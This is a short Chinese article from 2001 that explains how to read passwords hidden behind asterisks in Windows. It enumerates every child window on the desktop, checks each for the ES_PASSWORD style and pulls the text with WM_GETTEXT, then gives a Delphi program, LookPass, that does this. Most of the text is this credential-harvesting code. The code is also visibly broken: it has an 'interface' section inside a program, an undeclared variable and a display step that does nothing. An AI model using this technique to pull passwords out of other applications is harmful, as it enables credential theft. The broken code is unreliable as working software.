Windows系统的密码是很脆弱的,因为所有的密码输入的时候都显示为********
表面上看这很安全,因为一般人不懂*******是什么东西,但其实要看到*******
下的内容是很容易的事,工作原理如下:
Windows是基于窗口的消息驱动型作业系统,每个窗口都有自已的属性,其中密码窗
口的属性是ES_PASSWORD,所以我们可以利用枚举子窗口EnumChildWindows的方法
来找出系统中所有子窗口,再检查其属性GetWindowLong,若是ES_PASSWORD则是个密码窗
然后用SendMessage()取得窗口标题,那就是******下的真正内容
=========下面是Delphi程序=====================
program LookPass;
interface
uses
Windows, Messages, SysUtils;
var
hcount:integer;
//这是一个窗口响应函数,注意:Result:=true很重要,因为只有这样才能连续扫描所有子窗口
function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall;
var hw,hs,wlong:integer;
sbuf,sb2:array[0..256] of char;
sb1:string;
begin
//得到窗口的属性
wlong:=GetWindowLong(hwnd,GWL_STYLE);
//若属性为es_password则为密码窗
if (wlong and ES_PASSWORD)<>0 then
begin
inc(hcount);
//发送获取窗口标题的消息
sendmessage(hwnd,wm_gettext,40,integer(@sbuf));
//设置得到的密码
strpcopy(sbuf,format('[Password %d] = %s',[hcount,sbuf]));
//显示密码
end;
//result为true时继续扫描下一个子窗口
result:=true;
end;
begin
lp:=0;hcount:=0;
//枚举子窗口,GetDesktopWindow用来得到桌面的句柄
EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp);
end.
//////////////////////////////////////////////////////////////////////////////
作者:倪建华
Copyright (C) 2001-6-27 Allright Reserved.
本文地址:http://com.8s8s.com/it/it6082.htm